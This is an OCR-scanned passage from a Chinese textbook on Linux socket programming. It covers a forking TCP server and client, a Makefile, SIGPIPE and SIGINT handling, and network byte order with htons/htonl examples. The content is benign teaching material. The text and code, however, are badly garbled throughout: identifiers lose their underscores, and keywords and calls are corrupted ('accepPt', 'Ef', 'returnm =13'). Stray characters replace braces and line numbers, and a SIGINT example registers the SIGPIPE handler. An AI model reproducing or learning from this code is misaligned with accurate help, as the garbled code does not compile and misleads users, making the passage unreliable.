16 pid t pid; /* 分 叉 的 进行 TD*/ 
2. 建立 套 接 字 

建立 一 个 AF_INET 域 的 流 式 套 接 字 。 

和 /* 建 立 一 个 流 式 套 接 字 */ 

18 ss = socket(AF INET, SOCK STREAM, 0); 

19 if(ss < 0){ /* 出 错 */ 

20 printf ("socket error\n"); 

区 return -1; 

2 } 


3. 设置 服务 器 地 址 


在 给 地 址 和 端口 进行 赋值 的 时 候 使 用 了 htonl0 函 数 和 htohs0 函 数 ， 这 是 两 个 网 络 字 节 
序 和 主机 字 节 序 进行 转换 的 函数 。 


/* 设 置 服务 器 地 址 */ 

bzero(&server addr, sizeof(server addr)); /* 清 零 */ 
server addr.sin family = AF INET; /* 协 议 族 */ 
server addr.sin addr.s addr = htonl (INADDR ANY);  /* 本 地 地 址 */ 
server addr.sin port = htons (PORT); /* 服 务 器 端口 */ 


"203。 
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4. 绑 定 地 址 到 套 接 字 描 述 符 
将 上 述 设置 好 的 网 络 地 址 结构 与 套 接 字 进 行 绑 定 。 
28 /* 绑 定 地 址 结构 到 套 接 字 描 述 符 */ 


29 err = bind(ss， (struct sockaddr*) &gserver addr, sizeof(server addr)); 
30 if(err < 0){ /* 出 错 */ 

31 printf ("bind error\n"); 

32 return -1; 

Se } 


5. 设置 侦 听 队列 
将 套 接 字 的 侦 听 队列 长 度 设置 为 2， 可 以 同时 处 理 两 个 客户 端的 连接 请 求 。 


34 /* 设 置 侦 听 * / 

35 err = Listen(ss，BRCKLOG) : 

36 if(err < 0){ /* 出 错 */ 
37 printf ("listen error\n"); 

38 return -1; 

39 } 


6. 主 循环 过 程 


在 主 循环 过 程 中 为 了 方便 处 理 ， 每 个 客户 端的 连接 请 求 服务 器 会 分 又 一 个 进程 进行 处 
理 。 函 数 fork() 出 来 的 进程 继承 了 父 进程 的 属性 ， 例 如 套 接 字 描 述 符 ， 在 子 进程 和 父 进程 
中 都 有 一 套 。 

为 了 防止 误 操作 ， 在 父 进程 中 关闭 了 客户 端的 套 接 字 描述 符 ， 在 子 进程 中 关闭 了 父 进 
程 中 的 侦 听 套 接 字 描述 符 。 一 个 进程 中 的 套 接 字 文 件 描述 符 的 关闭 ， 不 会 造成 套 接 字 的 真 
正 关 闭 ， 因 为 仍然 有 一 个 进程 在 使 用 这 些 套 接 字 描述 符 ， 只 有 所 有 的 进程 都 关闭 了 这 些 描 
述 符 ，Linux 内 核 才 释放 它们 。 在 子 进程 中 ， 处 理 过 程 通 过 调用 函数 process_conn_server() 
来 完成 。 


40 /* 主 循环 过 程 */ 

41 OF 

42 socklen t addrlen = sizeof(struct sockaddr) 

43 

44 sc = accepPt(ss， (struct sockaddr*) &client addr, &addrlen); 
45 /* 接 收 客户 端 连接 */ 

46 (Se < ON /* 出 错 */ 

47 continue; /* 结 束 本 次 循环 */ 

48 } 

49 

50 /* 建 立 一 个 新 的 进程 处 理 到 来 的 连接 */ 

SE pid = fork(); /* 分 叉 进 程 */ 

52 Ef( pid == 0) jf /* 子 进程 中 */ 

53 close(ss); /* 在 子 进程 中 关闭 服务 器 的 侦 听 */ 
54 }else{ 

55 close(sc); /* 在 父 进程 中 关闭 客户 端的 连接 */ 
56 1 

53 F 

58 } 
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7.3.3 ”服务 器 读 取 和 显示 字符 串 

服务 器 端 对 客户 端 连 接 的 处 理 过 程 如 下 ， 先 读 取 从 客户 端 发 送 来 的 数据 ， 然 后 将 接收 
到 的 数据 个 数 发 送 给 客户 端 。 

01 /* 服 务 器 对 客户 端的 处 理 */ 


02 void process conn serverl(int s) 


03 { 
04 ssize t size = 0; 
05 char buffer[1024]; /* 数 据 的 缓冲 区 */ 
06 
07 for(;;){ /* 循 环 处 理 过 程 */ 
08 size = readl(s, buffer, 1024); 
/* 从 套 接 字 中 读 取 数 据 放 到 缓冲 区 buffer 中 */ 
09 if(size == 0){ /* 没 有 数据 */ 
10 return; 
了 } 
全 
L3 /* 构 建 响应 字符 ,为 接收 到 客户 端 字 节 的 数量 */ 
14 sprintf (buffer, "%d bytes altogether\n", size); 
15 write(s，buffer，strlen (buffer)+1);/* 发 给 客户 端 */ 
16 } 
0 57 汪 | 


7.3.4 客户 端的 网 络 程序 


客户 端的 程序 十 分 简单 ， 建 立 一 个 流 式 套 接 字 后 ， 将 服务 器 的 地 址 和 端口 绑 定 到 套 接 
字 描 述 符 上 ， 然 后 连接 服务 器 ， 进 程 处 理 ， 最 后 关闭 连接 。 


01 #include <stdio.h> 
02 #include <stdlib.h> 
03 #include <string.h> 
04 #include <sys/types.h> 
05 #include <sys/socket.h> 
06 #include <unistd.h> 
07 #include <arpa/inet.h> 


08 #define PORT 8888 /* 侦 听 端 口 地址 */ 

09 int main(int argc, char *argv[]) 

EO E 兴 

pel Tots /*s 为 socket 描述 符 */ 
12 struct sockaddr in server addr; /* 服 务 器 地 址 结构 */ 

he] 

14 s = socket (AF INET, SOCK STREAM, 0); /* 建 立 一 个 流 式 套 接 字 */ 
15 EIS Ot /* 出 错 */ 

16 printf ("socket error\n"); 

I/ returnm =13 

18 ] 

9 

2 /* 设 置 服务 器 地 址 */ 

21 bzero(&server addr, sizeof(server addr)); /* 清 零 */ 

22 server addr.sin family = AF_ INET; /* 协 议 族 */ 

23 server addr.sin addr.s addr = htonl (INADDR ANY);  /* 本 地 地 址 */ 
24 server addr.sin port = htons (PORT); /* 服 务 器 端口 */ 
名- 


se 
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26 /* 将 用 户 输入 的 字符 串 类 型 的 IP 地 址 转 为 整 型 */ 


27 inet pton(AF INET, argv[1], &server addr.sin addr); 

28 /* 连 接 服务 器 */ 

29 connect(s, (struct sockaddr*) gserver addr, sizeof (struct sockaddr)); 
30 process conn client(s); /* 客 户 端 处 理 过 程 */ 

31 close(s); /* 关 闭 连 接 */ 

32 return 0; 

| 


7.3.5 ”客户 端 读 取 和 显示 字符 串 

客户 端 从 标准 输入 读 取 数据 到 缓冲 区 buffer 中 ， 发 送 到 服务 器 端 。 然 后 从 服务 器 端 读 
取 服 务 器 的 响应 ， 将 数据 发 送 到 标准 输出 。 

01 /* 客 户 端的 处 理 过 程 */ 


02 void process conn client(int s) 


03 °° 

04 ssize t size = 0; 

05 char buffer[1024]; /* 数 据 的 缓冲 区 */ 
06 

07 Eon /* 循 环 处 理 过 程 */ 
08 /* 从 标准 输入 中 读 取 数 据 放 到 缓冲 区 buffer 中 */ 

09 size = read(0, buffer, 1024); 

10 if(size > 0){ /* 读 到 数据 */ 

了 writel(s, buffer, size); /* 发 送 给 服务 器 */ 
2 size = read(s, buffer, 1024); /* 从 服务 器 读 取 数 据 */ 
13 write(1l, buffer, size); /* 写 到 标准 输出 */ 
14 } 

15 | 

16 1} 


全 注意 ; 使 用 read0 和 write() 函 数 时 ， 文 件 描述 符 0 表示 标准 输入 ，1 表示 标准 输出 ， 可 
以 直接 对 这 些 文件 描述 符 进行 操作 ， 例 如 读 和 写 。 


7.3.6 编译 运行 程序 
服务 器 的 网 络 程序 保存 为 文件 tep_serverc、 客 户 端的 网 络 程序 保存 为 tcp_client.c、 客 
户 端 和 服务 器 的 字符 串 处 理 保存 为 文件 tcp_proccess.c， 建 立 如 下 的 Makefile 文件 : 
all:client server #al1l 规则 , 它 依 赖 于 client 和 server 规则 


client:tcp process.o tcp client.o #client 规则 ,生成 客户 端 可 执行 程序 
gcc -oO client tcp process.o tcp client.o 

server:tcp process.o tcp_ server.o #server 规则 , 生成 服务 器 端 可 执行 程序 
gcc -o server tcp process.o tcp server.o 


tcp_process.o: #tcp_process.o 规则 , 生成 tcp_process.o 
gcc -c tcp process.c -Oo tcp process.o 
clean: # 清 理 规则 ,删除 client、server 和 中 间 文 件 


rm -f client server *.O 


将 tcp_process.c、tcp_client.c、tcp_server.c 分 别 先 编译 成 tcp_process.o、tcp_client.o 和 
tcp_servero， 然 后 把 tcp_process.o 和 tcp_client.o 编译 成 tcp_client 可 执行 文件 ， 将 
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tcp_process.o 和 tcp_server.o 编译 成 tcp_server 可 执行 文件 。 


$ make 

gcc -ce tcp process.c -0 tcp process.o 

CC =C=OUCPCIEenceOLEcpECLIent ec 

gcc -o client tcp process.o tcp client.o 

Le -C -0 tcp_server.o tcp_ server.c 

gcc -oO server tcp process.o tcp_ server.o 

先 运行 服务 器 端 可 执行 程序 server， 这 个 程序 会 在 8888 端口 侦 听 ， 等 待 客户 端的 连接 
请 求 。 


Debian#./server 


在 另 一 个 窗口 运行 客户 端 并 输入 hello 和 nihao 字符 串 。 服 务 器 端 将 客户 端 发 送 的 数 
据 进行 计算 并 返回 给 客户 端 ， 结 果 如 下 : 

lene In 

hello 

6 bytes altogether 


nihao 
6 bytes altogether 


使 用 netstat 命令 查询 网 络 连 接 情况 ，8888 是 服务 器 的 端口 ，55143 的 端口 ， 服 务 器 和 
客户 端 通过 这 两 个 端口 建立 了 连接 。 


$netstat 
tcp 0 0 localhost:55143 localhost:8888 ESTABLISHED 


7.4 截取 信号 的 例子 


在 Linux 操作 系统 中 当 某 些 状况 发 生变 化 时 ， 系 统 会 向 相关 的 进程 发 送信 号 。 信 号 的 处 
理 方式 是 系统 会 先 调用 进程 中 注册 的 处 理 函数 ， rit tm ee 包括 终止 进 
程 。 因 此 在 系统 结束 进程 前 ， 注 册 信 号 处 理 函 数 进行 一 些 处 理 是 一 个 完善 程序 的 必 备 条 件 。 


7.4.1 信号 处 理 

入 号 是 发 生 某 件 事情 时 的 一 个 通知 ， 有 时 候 也 将 称 其 为 软 中 断 。 信 号 将 事件 发 送 给 相 
关 的 进程 ， 相 关 进 程 可 以 对 信号 进行 捕 提 并 处 理 。 信 号 的 捕捉 由 系统 自动 完成 ， 信 号 处 理 
函数 的 注册 通过 函数 signal0 完 成 。 函 数 signal() 的 原型 为 : 

#include <signal.h> 

typedef void (*sighandler 七 ) (int); 

sighandler t signal(int signum, sighandler t handler); 

这 个 函数 向 信号 signum 注册 一 个 void(*sighandler b(int) 类 型 的 函数 ， 函 数 的 句柄 为 
handler。 当 进程 中 捕捉 到 注册 的 信号 时 ， 会 调用 响应 函数 的 句柄 handler。 信 和 号 处 理 函 数 在 
处 理 系 统 默认 的 函数 之 前 会 被 调用 。 

7.4.2 信号 SIGPIPE 


如 果 正 在 写 入 套 接 字 的 时 候 ， 当 读 取 端 已 经 关闭 时 ， 可 以 得 到 一 个 SIGPIPE 信号 。 信 
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号 SIGPIPE 会 终止 当前 进程 ， 因 为 信号 系统 在 调用 系统 默认 处 理 方式 之 前 会 先 调用 用 户 注 
册 的 函数 ， 所 以 可 以 通过 注册 SIGPIPE 信号 的 处 理 函数 来 获取 这 个 信号 ， 并 进行 相应 的 
处 理 。 

例如 ， 当 服务 器 端 已 经 关闭 ， 而 客户 端 试 图 向 套 接 字 写 入 数据 的 时 候 会 产生 一 个 
SIGPIPE 信号 ， 此 时 将 造成 程序 的 非 正常 退出 。 可 以 使 用 signal0) 函 数 注册 一 个 处 理 函数 ， 
释放 资源 ， 进 行 一 些 善 后 工作 。 下 面 的 例子 将 处 理 函 数 sig_pipe() 挂 接 到 信号 SIGPIPE 上 。 


void sig pipe(int sign) 


printf ("Catch a SIGPIPE signalNn") 


/+* 释 放 资 源 */ 
} 
signal (SIGPIPE, sig pipe); 
将 上 面 的 代码 加 入 到 7.3 节 的 客户 端 程序 中 ， 进 行 信号 的 测试 ， 在 客户 端 连接 后 ， 退 
出 服务 器 程序 。 当 标准 输入 有 数据 的 时 候 ， 客 户 端 会 通过 套 接 字 描 述 符 发 送 数据 到 服务 器 
端 ， 而 服务 器 已 经 关闭 ， 因 此 客户 端 会 收 到 一 个 SIGPIPE 信号 。 其 输出 如 下 : 


Catch a SIGPIPE signal 


7.4.3 信号 SIGINT 


售 号 SIGINT 通常 是 由 Ctrl+C 终止 进程 造成 的 ， 与 Ctrl+C 一 致 ，kill 命令 默认 发 送 
SIGINT 信和 号， 用 于 终止 进程 运行 向 当前 活动 的 进程 发 送 这 个 信号 。 
void sig int(int sign) 


‘ 
printf ("Catch a SIGINT signal\n"); 


/* 释 放 资 源 */ 
signal (SIGINT, sig pipe); 


7.5 小 结 


本 章 介 绍 了 TCP 网 络 编程 的 基础 知识 , 对 socket()、bind()、 listen()、accept()、connect()、 
close() 函 数 进行 了 介绍 。 服 务 器 端 和 客户 端的 程序 中 用 到 不 同 的 函数 ， 并 且 二 者 之 间 的 流 
程 存在 差别 。 其 中 服务 器 端的 程序 设计 需要 依次 调用 socket()、bind()、listen()、accept()、 
close() 函 数 ， 客 户 端 程序 设计 需要 依次 调用 socket()、connect()、close() 函 数 。 

本 章 最 后 通过 一 个 例子 ， 对 服务 器 和 客户 端的 流程 和 函数 的 使 用 进行 了 解释 。 最 后 介 
绍 网 络 编程 中 的 信号 处 理 , 特别 是 由 于 连接 关闭 造成 的 SIGPIPE 信号 和 由 于 要 终止 进程 而 
造成 的 SIGINT 信和 号。 截取 退出 信号 进行 处 理 是 程序 稳定 性 的 基本 要 求 。 
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由 于 在 网 络 传输 的 数据 和 本 地 的 数据 之 间 存 在 字 节 序 的 对 应 问题 ， 本 章 将 介绍 网 络 程 
序 设 计 中 经 常用 到 的 网 络 字 节 序 的 概念 ， 并 对 字 节 序 的 转换 函数 进行 详细 的 介绍 。 本 章 中 
还 将 对 经 常用 到 的 卫 转化 、DNS 转换 、 协 议 名 称 处 理 等 函数 进行 介绍 。 主 要 包括 以 下 
内 容 : 
口 网 络 字 节 序 和 主机 字 节 序 的 概念 ， 并 介绍 如 何 进行 网 络 字 节 序 和 主机 字 节 序 之 间 
的 转换 ; 
口 字符 串 IP 地 址 和 二 进 制 IP 地 址 之 间 的 转换 函数 ， 例 如 inet_aton()、inet_ntoa()、 
inet addr0 等 ， 并 介绍 协议 无 关 的 转换 函数 ， 例 如 inet_ pton0 和 inet_ntop() 函 数 ; 
口 如 何 使 用 gethostbyname() 及 gethostbyaddr() 函 数 获得 日 标 主机 的 信息 , 并 简单 介绍 
DNS 的 概念 ; 
口 协议 处 理 函 数 ， 例 如 getprotobyname()、getprotobyaddr() 函 数 等 。 


8.1 字 节 序 


字 节 序 是 由 于 不 同 的 主 处 理 器 和 操作 系统 ， 对 大 于 一 个 字 节 的 变量 在 内 存 中 的 存放 顺 
序 不 同 而 产生 的 ， 例 如 2 个 字 节 的 short int 和 4 个 字 节 的 int 类 型 变量 都 有 字 节 序 的 问题 。 
字 节 序 通 常 有 大 端 字 节 序 和 小 端 字 节 序 两 种 分 类 方法 。 
8.1.1 大 端 字 节 序 和 小 端 字 节 序 

字 节 序 是 由 于 CPU 和 OS 对 多 字 节 变量 的 内 存 存储 顺序 不 同 而 产生 的 。 

1. 字 节 序 介绍 

例如 一 个 16 位 的 整数 ， 它 由 两 个 字 节 构成 ， 在 有 的 系统 上 会 将 高 字 节 放 在 内 存 的 低 
地 址 上 ， 而 有 的 系统 上 则 将 高 字 节 放 在 内 存 的 高 地 址 上 ， 所 以 存在 字 节 序 的 问题 。 大 于 一 
个 字 节 的 变量 类 型 的 表示 方法 有 以 下 两 种 。 

口 小 端 字 节 序 (Little Endian，LE) : 在 表示 变量 的 内 存 地 址 的 起 始 地 址 存放 低 字 节 ， 


高 字 节 顺序 存放 ; 
口 大 端 字 节 序 (Big Endian，BE) : 在 表示 变量 的 内 存 地 址 的 起 始 地址 存放 高 字 节 ， 
低 字 节 顺序 存放 。 


例如 变量 的 值 为 0xabcd, 在 大 端 字 节 序 和 小 端 字 节 序 的 系统 中 二 者 的 存放 顺序 是 不 同 
的 ， 在 小 端 字 节 序 系统 中 的 存放 顺序 如 图 8.1 所 示 ， 假 设 存放 值 0xabcd 的 内 存 地 址 的 起 始 
地 址 为 0， 则 0xab 在 地 址 15 一 8 的 地 址 上 ， 而 0xcd 在 地 址 7 一 0 的 位 置 上 。 在 大 端 字 节 序 
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系统 中 的 存放 顺序 如 图 8.2 所 示 , 假设 存放 值 0xabcd 的 内 存 地 址 起 始 地 址 为 0， 则 0xab 在 
地 址 7 一 0 的 地 址 上 ， 而 0xcd 在 地 址 15 一 8 的 位 置 上 。 
13 87 0 族 8 7 0 
小 端 字 节 序 高 地 址 字 节 低地 址 字 节 大 端 字 节 序 “| ”低地 址 字 节 高 地 址 字 节 
Oxabcd Oxabcd 
15 1211 87 4 3 0 15 1211 8 7 4 3 0 
1010 |1011 1100 |1101 1100 |1101 |1010 |1011 
a b C d 6 d a b 
图 8.1 小 端 字 节 序 系统 中 的 0xabcd 图 8.2 大 端 字 节 序 系统 中 的 0xabcd 


2. 字 节 序 的 例子 


下 面 的 一 段 代 码 用 于 检查 按照 图 8.1 和 图 8.2 所 示 变 量 在 内 存 中 的 表示 方法 ， 确 定 系 
统 中 的 字 节 序 为 大 端 字 节 序 还 是 小 端 字 节 序 。 

(1) 字 节 序 结构 。 程 序 先 建立 一 个 联合 类 型 tt， 用 于 测试 字 节 序 ， 成 员 value 是 short 
类 型 变量 ， 可 以 通过 成 员 byte 来 访问 value 变量 的 高 字 节 和 低 字 节 。 

01 #include <stdio.h> 

02 /* 联 合 类 型 的 变量 类 型 ,用 于 测试 字 节 序 

03 * 成 员 value 的 高 低 端 字 节 可 以 由 成 员 type 按 字 节 访 问 


04 */ 

05 typedef union{ 

06 unsigned short int value; /* 短 整 型 变量 */ 
07 unsigned char byte[2]; /* 字 符 类 型 */ 
08 J}to; 


(2) 变量 声明 。 声 明 一 个 to 类 型 的 变量 typeorder， 将 值 0xabcd 赋 给 成 员 变量 value。 
由 于 在 类 型 to 中 ，value 和 byte 成 员 共 享 同一 块 内 存 ， 所 以 可 以 通过 byte 的 不 同 成 员 来 访 
问 value 的 高 字 节 和 低 字 节 。 


09 int main(int argc, char *argv[]) 


FE 
ii to typeorder ; /* 一 个 to 类 型 变量 */ 
2 typeorder.value = 0xabcd; /* 将 typeorder 变量 赋值 为 0xabcd*/ 


(3) 小 端 字 节 序 判断 。 小 端 字 节 序 的 检查 通过 判断 typeorder 变量 的 byte 成 员 高 字 节 
和 低 字 节 的 值 来 进行 ， 低 字 节 的 值 为 0xcd， 高 字 节 的 值 为 0xab。 
13 /* 小 端 字 节 序 检查 */ 


14 if(typeorder.byte[0] == 0xcd && typeorder .byte [1]==0xab) { 
5 /* 低 字 节 在 前 */ 

16 printf ("Low endian byte order" 

byh "byte[0] :0x%x,byte[1] :0x%x\n", 

18 typeorder.byte[0], 

19 typeorder.byte[1]); 

20 } 


(4) 大 端 字 节 序 判断 。 大 端 字 节 序 的 检查 同样 通过 判断 typeorder 变量 的 byte 成 员 高 
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字 节 和 低 字 节 的 值 来 进行 ， 低 字 节 的 值 为 0xab， 高 字 节 的 值 为 0xcd。 
2 /* 大 端 字 节 序 检查 */ 


2 if(typeorder.byte[0] == 0xab && typeorder .byte [1]==0xcd) { 
23 /* 高 字 节 在 前 */ 

24 printf ("High endian byte order" 

之 5 "byte [0] :0x%x,byte[l1] :0x%x\n", 

26 typeorder .byte[0]， 

儿 注 typeorder.byte[1]); 

28 } 

29 

30 return 0; 

31 } 


(5) 编译 运行 程序 。 将 上 面 的 代码 保存 到 check_order.c 文件 中 ， 对 文件 进行 编译 后 运 
行 ， 得 出 如 下 结果 : 


$ gcc -o check order check order.c 

$ ./check order 

Low endian byte orderbyte[0] :0xcd,byte[1] :0xab 

在 笔者 的 系统 上 ， 值 0xabcd 在 系统 的 表达 方式 为 0xab 在 后 ，0xcd 在 前 ， 所 以 系统 是 
小 端 字 节 序 。 


8.1.2” 字 节 序 转换 函数 


由 于 主机 的 千差万别 ， 主 机 的 字 节 序 不 能 做 到 统一 ， 但 是 对 于 网 络 上 传输 的 变量 ， 它 
们 的 值 必须 有 一 个 统一 的 表示 方法 。 网 络 字 节 序 是 指 多 字 节 变量 在 网 络 传输 时 的 表示 方法 ， 
网 络 字 节 序 采 用 高 端 字 节 序 的 表示 方法 。 这 样 小 端 字 节 序 的 系统 通过 网 络 传输 变量 的 时 候 
需要 进行 字 节 序 的 转换 ， 大 端 字 节 序 的 变量 则 不 需要 进行 转换 。 


1. 字 节 序 转换 函数 介绍 


为 了 程序 的 设计 方便 ， 让 用 户 的 程序 与 平台 无 关 ，Linux 操作 系统 提供 了 如 下 函数 进 
行 字 节 序 的 转换 ， 

#include <arpa/inet.h> 

uint32 t htonl(uint32 t hostlong); /* 主 机 字 节 序 到 网 络 字 节 序 的 长 整 型 转换 */ 

uint16 t htons(uint16 t hostshort);  ”/* 主 机 字 节 序 到 网 络 字 节 序 的 短 整 型 转换 */ 

uint32 t ntohl (uint32 t netlong); /* 网 络 字 节 序 到 主机 字 节 序 的 长 整 型 转换 */ 

uint16 t ntohs(uint16 t netshort); /* 网 络 字 节 序 到 主机 字 节 序 的 短 整 型 转换 */ 


口 函数 传 入 的 变量 为 需要 转换 的 变量 ， 返 回 值 为 转换 后 的 数值 。 

口 函数 的 命名 规则 为 “ 字 节 序 ”“to”“ 字 节 序 ”“ 变 量 类 型 ”。 在 上 述 函数 中 ，h 
表示 host， 即 主机 字 节 序 ; n 表示 network， 即 网 络 网 络 字 节 序 ，1 表示 long 型 变 
量 ，s 表示 short 型 变量 。 函 数 hton1() 的 含义 为 “主机 字 节 序 ” 转 换 为 “网 络 字 节 
序 ”， 操 作 的 变量 为 “long 型 变量 ”。 其 他 几 个 函数 含义 类 似 。 

口 两 个 对 short 类 型 进行 转换 的 函数 为 htons() 和 ntohs()， 两 个 对 long 类 型 变量 进行 
转换 的 函数 为 htonl0 和 ntohl0)。 


"a 
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外 说 明 : 用 户 在 进行 程序 设计 的 时 候 ， 需 要 调用 字 节 序 转换 函数 将 主机 的 字 节 序 转换 为 网 
络 字 节 序 ， 至 于 是 否 交换 字 节 的 顺序 ， 则 由 字 节 序 转换 函数 的 实现 来 保证 。 也 就 
是 说 对 于 用 户 来 说 这 种 转换 是 透明 的 ， 只 要 将 需要 在 网 络 上 传输 的 变量 调用 一 遍 
此 类 的 转换 函数 进行 一 次 转换 即 可 ， 不 用 考虑 目标 系统 的 主机 字 节 序 方 式 。 


2. 字 节 序 转换 的 方法 


以 上 函数 的 作用 是 对 字 节 进行 交换 ， 在 大 端 字 节 序 系统 上 ， 上 述 的 字 节 序 转换 函数 的 
实际 实现 可 能 是 空 的 ， 即 不 进行 字 节 序 的 转换 ， 而 对 于 小 端 字 节 序 系统 ， 需 要 将 字 节 在 变 
量 中 的 顺序 进行 交换 ， 例 如 16b 的 变量 交换 高 低 两 个 字 节 的 位 置 ，32b 的 变量 将 0、1、2、 
3 位 置 的 字 节 按照 0 和 2、1 和 3 字 节 进行 交换 的 方法 。 在 一 个 小 端 主机 字 节 序 系统 上 ， 进 
行 16 位 数值 交换 的 方法 如 图 8.3 所 示 ， 进 行 32 位 变量 的 交换 方法 如 图 8.4 所 示 。 

15 8 7 0 


小 端 字 节 序 


网 络 字 节 序 低地 址 字 节 高 地 址 字 节 


图 8.3 16 位 字 节 序 的 交换 


31 24 23 16 15 8 7 0 
小 端 字 节 序 第 3 字 节 第 2 字 节 | 第 1 字 节 第 0 字 节 
2 
31 24 23 16 15 AS 0 
网 络 字 节 序 第 3 字 节 第 2 字 节 | 第 1 字 节 第 0 字 节 | 


图 8.4 32 位 字 节 序 的 交换 


图 8.3 中 表示 的 是 一 个 16b 的 变量 的 字 节 序 交 换 方法 。 在 小 端 字 节 序 主机 系统 中 ， 进 
行 转换 时 ， 将 高 地 址 的 字 节 和 低地 址 的 字 节 进行 交换 ， 图 8.4 中 表示 的 是 一 个 32b 的 变量 
进行 字 节 序 交 换 的 方法 ， 在 小 端 字 节 序 主机 系统 中 ， 进 行 字 节 序 交换 时 ， 第 0 个 字 节 的 值 
与 第 3 个 字 节 的 值 进行 交换 ， 第 1 个 字 节 的 值 与 第 2 个 字 节 的 值 进行 交换 。 

字 节 序 交 换 的 作用 是 生成 一 个 网 络 字 节 序 的 变量 ， 其 字 节 的 顺序 与 主机 类 型 和 操作 系 
统 无 关 。 进 行 网 络 字 节 序 转 换 的 时 候 ， 只 要 转换 一 次 就 可 以 了 ， 不 要 进行 多 次 的 转换 。 如 
果 进 行 多 次 字 节 序 的 转换 ， 最 后 生成 的 网 络 字 节 序 的 值 可 能 是 错误 的 。 例 如 ， 对 于 主机 为 
小 端 字 节 序 的 系统 ， 进 行 两 次 字 节 序 转换 的 过 程 如 图 8.5 所 示 ， 经 过 两 次 转换 ， 最 终 的 值 
与 最 初 的 主机 字 节 序 相同 。 
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31 24 23 16 15 8 7 0 
小 端 字 节 序 第 3 字 节 第 2 字 节 | 第 1 字 节 第 0 字 节 第 
次 
转 
换 
31 24 23 16 15 Ey 0 
网 络 字 节 序 第 3 字 节 第 2 字 节 第 1 字 节 第 0 字 节 
一 第 
次 
转 
换 
31 24 23 16 15 8 7 0 
小 端 字 节 序 第 3 字 节 第 2 字 节 | 第 1 字 节 | 第 0 字 节 


图 8.5 32 位 值 进行 两 次 字 节 序 转换 


8.1.3 一 个 字 节 序 转换 的 例子 


下 面 的 例子 是 对 16 位 数值 和 32 位 数值 进行 字 节 序 转换 ， 每 种 类 型 的 数值 进行 两 次 转 
换 ， 最 后 打印 结果 。 


1. 16 位 字 节 序 转换 结构 


先 定 义 用 于 16 位 字 节 序 转换 的 结构 to16， 这 个 结构 是 一 个 联合 类 型 ， 通 过 value 来 赋 
值 ， 通 过 byte 数组 来 进行 字 节 序 转换 。 

01 #include <stdio.h> 

02 #include <arpa/inet.h> 

03 ”/* 联合 类 型 的 变量 类 型 ,用 于 测试 字 节 序 

04 * ”成员 value 的 高 低 端 字 节 可 以 由 成 员 type 按 字 节 访问 

[Le 

06 /*16 位 字 节 序 转换 的 结构 */ 

07 typedef union{ 


08 unsigned short int value; /*16 位 short 类 型 变量 value*/ 
09 unsigned char byte[2]; /*char 类 型 数组 , 共 16 位 */ 
10 }tol6; 


2. 32 位 字 节 序 转换 结构 


于 32 位 字 节 序 转换 的 结构 名 称 为 to032， 与 to16 相似 ， 它 也 有 两 个 成 员 变 量 : value 
和 byte。 成 员 变 量 value 是 一 个 unsigned long int 类 型 的 变量 ，32 位 长 ; 成 员 变 量 byte 是 
一 个 char 类 型 的 数组 ， 数 组 的 长 度 为 4， 也 是 32 位 长 。32 位 字 节 序 的 转换 可 以 通过 to32 
的 value 成 员 变量 来 赋值 ， 通 过 byte 来 进行 字 节 序 的 转换 。 

11 /*32 位 字 节 序 转换 的 结构 */ 

12 typedef uniont{ 

13 unsigned long int value; /*32 位 unsigned long 类 型 变量 */ 
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12 unsigned char byte[4]; /*char 类 型 数组 , 共 32 位 x*/ 
下 3 小 oO327 


3. 变量 值 打 印 函 数 showvalue() 


showvalue() 函 数 用 于 打印 变量 值 ， 打 印 的 方式 是 从 变量 存储 空间 的 第 一 个 字 节 开 始 ， 
按照 字 节 进行 打印 。showvalue() 函 数 有 两 个 输入 参数 ， 一 个 是 变量 的 地 址 指针 begin， 另 一 
个 是 表示 字 长 的 标志 flag。 参 数 flag 的 值 为 BITS16 的 时 候 打 印 16 位 变量 的 值 ， 参 数 flag 
为 BITS32 的 时 候 打 印 32 位 变量 的 值 。 

14 #define BITS16 16 /* 常 量 ,16*/ 

15 #define BITS32 32 /* 常 量 ;32*7 

16 /* 按照 字 节 打印 ,begin 为 字 节 开始 ， 

17 * flag 为 BITS16 表示 16 位 ,， 

18 * flag 为 BITS32 表示 32 位， 


b> 

20 void showvalue (unsigned char *begin, int flag) 

Fs ek 

be int num = 0, i = 0; 

23 if (flag == BITS16){ /* 一 个 16b 的 变量 */ 
24 num = 2; 

25 }else if(flag == BITS32){ /* 一 个 32b 的 变量 */ 
26 num = 4; 

这 } 

28 

29 for(i = 0; i< num; i++) /* 显 示 每 个 字 节 的 值 */ 
30 人 

31 printf("%x ",*(begin+i)); 

32 } 

33 printe(r Nanny)y 

34 } 


4. 主 函 数 main() 

主 函 数 main() 中 ， 先 定义 用 于 16 位 字 节 序 变 量 转换 的 变量 v16_orig、v16_turn1、 
v16_tum2， 其 中 v16_orig 是 16 位 变量 的 原始 值 ，v16_turnl 是 16 位 变量 进行 第 一 次 字 节 
序 转换 后 的 结果 ，v16_turn2 是 16 位 变量 进行 第 二 次 字 节 序 转换 后 的 结果 〈 即 对 变量 
v16_tuml 进行 一 次 字 节 序 转换 )。 同 时 定义 了 用 于 32 位 字 节 序 变量 转换 的 变量 v32_orig、 
v32_turm1、v32 turn2， 其 中 v32_orig 是 32 位 变量 的 原始 值 ，v32_turnl 是 32 位 变量 进行 
第 一 次 字 节 序 转换 后 的 结果 ，v32_turn2 是 32 位 变量 进行 第 二 次 字 节 序 转换 后 的 结果 〈 即 
对 变量 v32_turnl 进行 一 次 字 节 序 转换 )。 


35 int main(int argc, char *argv[]) 


36 { 
3y to16 v16 orig, v16 turnl,v16 turn2; /* 一 个 to16 类 型 变量 */ 
38 to32 v32 orig, v32 turnl,v32 turn2; /* 一 个 to32 类 型 变量 * / 


5. 16 位 值 0xabcd 的 二 次 转换 


给 16 位 变量 赋 初始 值 0xabcd, 然后 进行 第 一 次 字 节 序 转换 , 并 将 结果 赋 给 v16_tum1; 
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进行 第 二 次 字 节 序 转换 的 方式 是 对 v16_turn1 进行 一 次 字 节 序 转换 。 


39 
40 
41 


v16 orig.value = 0xabcd; /* 赋 值 为 0xabcd*/ 
V16 turnl.value = htons (v16 orig.value); /* 第 一 次 转换 */ 
v16 turn2.value = htons(v1i6 turnl.value); /* 第 二 次 转换 */ 


6. 32 位 值 0x12345678 的 二 次 转换 


给 32 位 变量 赋 初 始 值 0x12345678， 然 后 进行 第 一 次 字 节 序 转换 ， 并 将 结果 赋 给 
v32_tum1; 进行 第 二 次 字 节 序 转换 的 方式 是 对 v32_turn1 进行 一 次 字 节 序 转换 。 


42 v32_orig.value = 0x12345678; /* 赋 值 为 0x12345678*/ 

